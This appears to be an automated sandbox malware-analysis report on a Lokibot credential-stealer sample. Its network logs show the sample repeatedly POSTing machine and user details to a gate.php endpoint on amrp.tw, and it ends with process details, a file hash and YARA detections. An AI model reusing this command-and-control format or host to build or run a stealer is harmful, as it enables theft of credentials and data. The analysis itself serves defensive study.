                                            Apr 29, 2021 09:20:11.574177027 CEST6101OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:12.041265965 CEST6101INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:12 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            66192.168.2.34980435.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:20:12.553500891 CEST6102OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:12.802506924 CEST6102OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:13.276144981 CEST6103INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:13 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            67192.168.2.34980535.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:20:13.820240974 CEST6103OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:14.065867901 CEST6104OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:14.527230978 CEST6104INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:14 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            68192.168.2.34980635.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:20:15.758589983 CEST6105OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:16.005445957 CEST6105OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:16.469253063 CEST6105INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:16 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            69192.168.2.34980735.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:20:17.017693043 CEST6106OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:17.263936043 CEST6106OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:17.732038021 CEST6107INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:18 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            7192.168.2.34973335.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:18:53.571367979 CEST1164OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:18:53.817255020 CEST1165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:18:54.494051933 CEST1165INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:18:54 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            70192.168.2.34980835.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:20:18.222249031 CEST6107OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:18.467852116 CEST6108OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:19.481174946 CEST6108INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:19 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            71192.168.2.34980935.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:20:19.971364975 CEST6109OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:20.217267990 CEST6109OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:20.682220936 CEST6109INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:21 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            72192.168.2.34981035.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:20:21.190798998 CEST6110OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:21.435870886 CEST6110OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:21.917289019 CEST6111INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:22 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            73192.168.2.34981135.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:20:22.423304081 CEST6112OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:22.669348955 CEST6112OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:23.374578953 CEST6112INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:23 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            74192.168.2.34981235.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:20:23.869111061 CEST6113OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:24.118428946 CEST6113OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:24.587765932 CEST6113INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:24 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            75192.168.2.34981335.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:20:25.087244987 CEST6114OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:25.335743904 CEST6115OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:25.805234909 CEST6115INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:26 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            76192.168.2.34981435.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:20:26.307610989 CEST6116OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:26.553095102 CEST6116OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:27.024369001 CEST6116INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:27 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            77192.168.2.34981535.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:20:27.531953096 CEST6117OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:27.778146029 CEST6117OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:28.247987032 CEST6118INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:28 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            78192.168.2.34981635.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:20:28.741976023 CEST6118OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:28.987257957 CEST6119OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:29.459114075 CEST6119INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:29 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            79192.168.2.34981735.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:20:29.941660881 CEST6120OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:30.191807032 CEST6120OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:30.664474010 CEST6120INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:30 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            8192.168.2.34973435.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:18:55.018479109 CEST1195OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:18:55.267853975 CEST1208OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:18:55.731251955 CEST1208INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:18:56 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            80192.168.2.34981835.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:20:31.136632919 CEST6121OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:31.382211924 CEST6121OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:31.850343943 CEST6122INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:32 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            9192.168.2.34973835.247.234.23080C:\Users\user\Desktop\FJbeidnZOF.exe
                                            TimestampkBytes transferredDirectionData
                                            Apr 29, 2021 09:18:56.255489111 CEST1231OUTPOST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:18:56.501069069 CEST1231OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:18:56.963195086 CEST1231INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:18:57 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Code Manipulations

                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            Analysis Process: FJbeidnZOF.exe PID: 5392 Parent PID: 5624

                                            General

                                            Start time:09:18:24
                                            Start date:29/04/2021
                                            Path:C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Users\user\Desktop\FJbeidnZOF.exe'
                                            Imagebase:0x120000
                                            File size:653824 bytes
                                            MD5 hash:0B43C829AF2EB773A3614B02BA5B8C5F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.238998741.0000000003529000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.238998741.0000000003529000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.238998741.0000000003529000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.238998741.0000000003529000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmp, Author: Joe Security
